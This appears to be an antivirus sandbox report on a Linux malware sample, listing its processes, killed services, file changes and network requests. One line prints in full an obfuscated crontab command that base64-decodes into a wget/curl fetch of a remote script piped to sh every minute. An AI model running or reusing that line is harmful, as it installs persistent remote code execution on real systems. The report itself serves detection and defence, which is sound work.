Technical Information
Malicious functions:
Removes itself
Launches itself as a daemon
Substitutes application name for:
- dvywiw
Launches processes:
- sh -c /root/frwfuw brfrwf
- sh -c /root/frwfuw
- /root/frwfuw
- sh -c /root/rmiseg crivtu
- /root/rmiseg crivtu
- sh -c /root/pwhwwg
- /root/pwhwwg
- sh -c echo '* * * * * echo -n \"bm9odXAgd2dldCAtTyAtIGh0dHA6Ly8xODUuMTY1LjE2OS42L2QvX3ouc2h8c2ggMj4mMSB8fCBub2h1cCBjdXJsIGh0dHA6Ly8xODUuMTY1LjE2OS42L2QvX3ouanBnfHNoIDI+JjEg\" | base64 -d |sh > /dev/null' | crontab -;
- crontab -
- sh -c /root/rsfflh
- sh -c /root/mwdmhh crmwdm
- /root/mwdmhh crmwdm
Kills system processes:
- sshd
Kills the following processes:
- kauditd
- systemd-journal
- systemd-udevd
- kpsmoused
- ttm_swap
- kvm-irqfd-clean
- dhclient
- rpcbind
- rpc.statd
- rpciod
- nfsiod
- rpc.idmapd
- cron
- atd
- systemd-logind
- rsyslogd
- acpid
- dbus-daemon
- agetty
- exim4
- kworker/0:3
- systemd
- (sd-pam)
- bash
- run.sh
- Unknown process with PID: 733
- /bin/sh
- kworker/u2:0
Performs operations with the file system:
Modifies file access rights:
- /root/frwfuw
- /root/rmiseg
- /root/pwhwwg
- /root/rsfflh
- /root/mwdmhh
Creates or modifies files:
- /root/frwfuw
- /root/rmiseg
- /root/pwhwwg
- /root/rsfflh
- /var/spool/cron/crontabs/tmp.oq3OAs
- /root/mwdmhh
Deletes files:
- /root/frwfuw
- /root/rmiseg
- /root/pwhwwg
- /root/rsfflh
- /root/mwdmhh
Network activity:
HTTP GET requests:
- 18#.##5.169.6/d/sss
- 18#.###.169.6/d/lmmml